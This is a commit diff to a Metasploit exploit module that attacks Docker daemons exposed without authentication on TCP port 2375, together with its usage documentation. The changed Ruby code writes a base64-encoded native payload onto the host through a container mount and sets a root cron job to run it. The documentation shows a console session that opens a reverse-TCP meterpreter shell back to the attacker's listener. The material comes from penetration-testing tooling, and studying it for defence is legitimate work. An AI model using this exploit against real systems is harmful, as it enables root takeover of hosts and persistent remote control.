Change to ARCH_X64, remove python dependency

Author: mpizala

documentation/modules/exploit/linux/http/docker_daemon_tcp.md

@@ -88,8 +88,8 @@ to gain root access to the hosting server of the Docker container.
 msf > use exploit/linux/http/docker_daemon_tcp
 msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23
 RHOST => 192.168.66.23
-msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp
-PAYLOAD => python/meterpreter/reverse_tcp
+msf exploit(docker_daemon_tcp) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
 msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10
 LHOST => 192.168.66.10
 msf exploit(docker_daemon_tcp) > set VERBOSE true
@@ -108,18 +108,17 @@ msf exploit(docker_daemon_tcp) > run
 [*] Waiting for the cron job to run, can take up to 60 seconds
 [*] Waiting until the docker container stopped
 [*] The docker container has been stopped, now trying to remove it
-[*] Sending stage (40411 bytes) to 192.168.66.23
+[*] Sending stage (2878936 bytes) to 192.168.66.23
 [*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200
 [+] Deleted /etc/cron.d/lVoepNpy
 [+] Deleted /tmp/poasDIuZ
 
 
 meterpreter > sysinfo
-Computer        : debian
-OS              : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26)
-Architecture    : x64
-System Language : en_US
-Meterpreter     : python/linux
+Computer     : rancher
+OS           : Debian 9.1 (Linux 4.9.0-3-amd64)
+Architecture : x64
+Meterpreter  : x64/linux
 meterpreter >
 ```
 

modules/exploits/linux/http/docker_daemon_tcp.rb

@@ -32,24 +32,17 @@ def initialize(info = {})
         ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
       ],
       'DisclosureDate'   => 'Jul 25, 2017',
-      'Targets'          => [
-        [ 'Python', {
-          'Platform'     => 'python',
-          'Arch'         => ARCH_PYTHON,
-          'Payload'      => {
-            'Compat'     => {
-              'ConnectionType' => 'reverse noconn none tunnel'
-            }
-          }
-        }]
-      ],
-      'DefaultOptions'   => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
+      'Platform'         => 'Linux',
+      'Arch'             => [ARCH_X64],
+      'Payload'          => { 'Space' => 65000 },
+      'Targets'          => [[ 'Linux', {} ]],
+      'DefaultOptions'   => { 'WfsDelay' => 180 },
       'DefaultTarget'    => 0))
 
     register_options(
       [
         Opt::RPORT(2375),
-        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
+        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]),
         OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
       ]
     )
@@ -88,13 +81,10 @@ def make_cmd(mnt_path, cron_path, payload_path)
     echo_cron_path = mnt_path + cron_path
     echo_payload_path = mnt_path + payload_path
 
-    cron_command = "python #{payload_path}"
-    payload_data = payload.raw
-
-    command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
-    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
-    command << "echo \"\" >> #{echo_cron_path} && "
-    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
+    command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& "
+    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& "
+    command << "echo \"\" >> #{echo_cron_path} \&\& "
+    command << "echo \"* * * * * root #{payload_path}\" >> #{echo_cron_path}"
 
     command
   end